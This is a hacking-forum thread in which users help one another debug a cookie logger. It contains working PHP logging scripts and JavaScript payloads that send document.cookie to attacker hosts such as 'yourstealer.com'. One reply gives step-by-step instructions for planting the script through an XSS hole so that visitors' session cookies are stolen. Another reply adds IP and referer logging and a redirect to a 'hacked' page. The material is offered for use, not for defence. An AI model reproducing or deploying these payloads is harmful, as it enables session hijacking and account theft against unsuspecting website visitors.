Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Review my cookieLogger

  1. Home
  2. Forum
  3. Web hacking
  4. Review my cookieLogger

ghost's Avatar

ghost

0 0

My cookie logger wont work can someone tell me what i am doing wrong..

<?php $cookie = $HTTP_GET_VARS["cookie"]; $file = fopen('cookielog.txt', 'a'); fwrite($file, $cookie . "\n\n"); ?>

I save it as cookie.php

<script language="JavaScript"> document.location="http://www.host.com/xboxsomthing1.t35/cookie.php?cookie=" + document.cookie; </script>

i save it as cook.html and when i try it on myself it doesnt work. all i get in my .txt is blanks.

What am i doing wrong?


Uber0n's Avatar

Uber0n

Member
0 0

The first thing I see is a weird URL - are you sure this domain name is correct? :right:

markuphttp://www.host.com/xboxsomthing1.t35/cookie.php My recommendation if you want a good cookie logger is WhiteAcid's Community Cookie Logger (CCL).

http://ccl.whiteacid.org/


ghost's Avatar

ghost

0 0

lazydude2000 wrote: My cookie logger wont work can someone tell me what i am doing wrong..

[quote]<?php $cookie = $HTTP_GET_VARS["cookie"]; $file = fopen('cookielog.txt', 'a'); fwrite($file, $cookie . "\n\n"); ?>

I save it as cookie.php

<script language="JavaScript"> document.location="http://www.host.com/xboxsomthing1.t35/cookie.php?cookie=" + document.cookie; </script>

i save it as cook.html and when i try it on myself it doesnt work. all i get in my .txt is blanks.

What am i doing wrong?[/quote]

here is mine

<?php $cookie = $_GET['cookie']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a");; $referer=getenv ('HTTP_REFERER'); $fp = fopen("cookies.txt", "a"); fwrite($fp, 'Cookie: '.$cookie.' IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.''); fclose($fp); header ("Location:http://www.falling-midget.t35.com/hacked.html"); ?>

that logs the referer the ip the date and the cokie.

your url is so wierd. try <script>window.location='http://www.yourstealer.com/stealer.php' + document.cookie</script>


AldarHawk's Avatar

AldarHawk

The Manager
0 0

the problem is the txt file does not have write access on it from ALL. do a chmod 777 cookie.txt and you will be good :D


ghost's Avatar

ghost

0 0

Ok fallingmidget i tried yours

stupid question…when i click on the html i don't get a log but when i click on the php i get a log. Is it supose to do that?

Also i get this, i tried it on t35. so is it working ?

Cookie: IP: 75.73.180.165 Date and Time: 5 May, 2008, 5:31 pm Referer: http://freehostcp.t35.com/cp/index.php

I did the chomd thing

sorry for all of the stupid questions


ghost's Avatar

ghost

0 0

Anyone know why i am getting utmz utmcsr utma


Infam0us's Avatar

Infam0us

Member
0 0

lazydude2000 wrote: My cookie logger wont work can someone tell me what i am doing wrong..

[quote]<?php $cookie = $HTTP_GET_VARS["cookie"]; $file = fopen('cookielog.txt', 'a'); fwrite($file, $cookie . "\n\n"); ?>

I save it as cookie.php

<script language="JavaScript"> document.location="http://www.host.com/xboxsomthing1.t35/cookie.php?cookie=" + document.cookie; </script>

i save it as .html and when i try it on myself it doesnt work. all i get in my .txt is blanks.

What am i doing wrong?[/quote]

First off, change the http://www.host.com/xboxsomthing1.t35/cookie.php to a site that you are hosting that has php supported. Try t35.com and make a free subdomain. It looks to me like your cookie logger works like this..

  1. create a php document and name it cookielogger.php, and inside that php file put
$cookie = $HTTP_GET_VARS[&quot;cookie&quot;];	
$file = fopen(&#39;cookielog.txt&#39;, &#39;a&#39;);	
fwrite($file, $cookie . &quot;&#92;n&#92;n&quot;);	
?&gt;	```
and save it.

2) Make a TEXT file called cookielog.txt, and make it CHMOD 777. That is very important, in other words make it so that it is **writable** by the cookielogger.php.
3) Now heres where you have to put in work, find an xss hole in a website and insert the script 
```markup&lt;script language=&quot;JavaScript&quot;&gt;					document.location=&quot;http://www.**yourwebsite.com**/cookielogger.php?cookie=&quot; + document.cookie;	
&lt;/script&gt;	```
This script will redirect whoever see&#39;s the page you found the xss hole in to yoursite and will add there cookie to the end of the URL.  The php file just takes everything after &quot;?cookie=&quot; and puts it into a variable called $cookie and writes it to the file &quot;cookielog.txt&quot;.  Hope it helps, if your still confused you can pm me.

ghost's Avatar

ghost

0 0

lazydude2000 wrote: Anyone know why i am getting utmz utmcsr utma

The cookies

__utma __utmz

…and others are part of Google Analytics (Urchin module) and appear for every site that uses Google Analytics to see how it is being used.

More specifically:

* __utmz tracks where a visitor came from (search engine, search keyword, link) 

* __utma tracks each user&#39;s amount of visits, first and last visit. 

* __utmb and __utmc are used to track when a visit starts and ends. (C expires quickly) 

* __utmv is used for custom variables

Credit: http://helpful.knobs-dials.com/index.php/Utma,_utmb,_utmz_cookies


ghost's Avatar

ghost

0 0

Ok…

When i click on my html it don't get a cookie but when i click on my php file i get one. Is it suppose to do that because i thought when you click the html it goes to the php then gets the cookie.